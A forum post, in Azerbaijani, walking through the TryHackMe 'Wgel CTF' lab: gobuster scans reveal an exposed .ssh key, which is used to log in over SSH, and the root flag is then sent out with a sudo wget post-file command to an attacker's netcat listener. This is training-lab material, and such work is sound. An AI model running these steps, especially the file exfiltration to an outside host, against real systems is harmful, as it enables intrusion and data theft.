What's new
By:
Advanced search…

Welcome to CyberDark

Join us now to get access to all our features. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, and so, so much more. It's also quick and totally free, so what are you waiting for?
Log in Register

Latest Thread

TryHackMe: Wgel CTF

Owner

Owner 

Owner
Moderator
Active User
Joined
Aug 23, 2023
Messages
246
Solutions
3
Reaction score
1,166
Points
3,131
Location
Senegal
Website
cyberdark.org

Salam bu forumda TryHackme: Wgel CTF sualina baxacagiq.


Ilk once hedef sistemi gobuster ile scan edirik.​


Bash: 
gobuster dir -u http://10.10.222.41 -w /usr/share/wordlists/dirb/common.txt



5381852437641553466

Saytda sitemap adinda directory oldugunu goruruk.Daha sonra /sitemap directory bir daha gobusterle scan edirik belkede basqa bir directory vardir.​

Bash: 
gobuster dir -u http://10.10.222.41/sitemap -w /usr/share/wordlists/dirb/common.txt

5381852437641553465

Scan bitdikden sonra .ssh adinda directory oldugunu goruruk.Bu bizim isimize yaraya biler. /sitemap/.ssh directory gedirik.






5381852437641553464


5381852437641553463


Budur bizim isimize yarayacaq ssh key tapdiq.Bununla biz ssh ile sisteme baglana bilerik. Bu id_rsa faylini kompyuterimize qeyd edirik ve asagidaki emr ile lazimi icazeleri veririk.


Bash: 
chmod 600 id_rsa


5381852437641553462



5381852437641553461

Asagidaki emr vasitesi ile ssh baglantisi qururuq​

Bash: 
ssh -i id_rsa [email protected]


5381852437641553458



Ve budur sistemdeyik....

Bash: 
locate flag.txt
emri ile flagi axtaririq.

User flagini tapdiq.

Indi root flagini tapmaliyiq. Bunun ucun root yetkisi lazimdir ancak biz bundan istifade etmeyeceyik. wget emri vasitesi ile root flagini rahatliqla oz kali linuxumuza gondere bilerik bunun ucun asagidaki emri istifade edeceyik.

Ilk once nc toolu vasitesi ile her hansisa portu dinlemeye alacagiq.

kali linux terminalimizda bu emri yazaq

Bash: 
nc -nlvp 4444
bu emr ile 4444 portunu izlemeye aliriq.

Daha sonra ifconfig ile oz kali linux IP adresini oyrenek.Ancaq diqqet edinki Tryhackme vpn ile baglanmisiniz ona gore tryhackmenin verdiyi ip adresini alin.


Daha sonra hedef servere gelib terminala bu emri yaziriq.


Bash: 
sudo wget -post-file-/root/root_flag.txt 10.2.0.203:4444

Daha sonra kali linux terminala daxil olub root flagini gore bilerik....


COPY PAST etmeyesiniz deye flaglari vermirem.Ozunuz hell edin:)

 

Attachments

  • 5381852437641553460.jpg
    5381852437641553460.jpg
    67.1 KB · Views: 2
  • 5381852437641553460.jpg
    5381852437641553460.jpg
    67.1 KB · Views: 2
  • 5381852437641553459.jpg
    5381852437641553459.jpg
    46.5 KB · Views: 1
elsenoraccount

elsenoraccount 

Moderator
Joined
Jul 9, 2024
Messages
269
Reaction score
910
Points
0
Age
34
Location
Mexico
Təşəkkürlər, maraqlı ctf di
 
You must log in or register to reply here.

Haqqımızda

Azərbaycanın Hacking Forum saytı

Newest members

  • F
  • N
  • TechSphereAz
  • A
  • BAYQUŞ
  • S
  • A
  • M
  • A
  • S
  • S
  • R

What's new

New posts
Latest activity
Top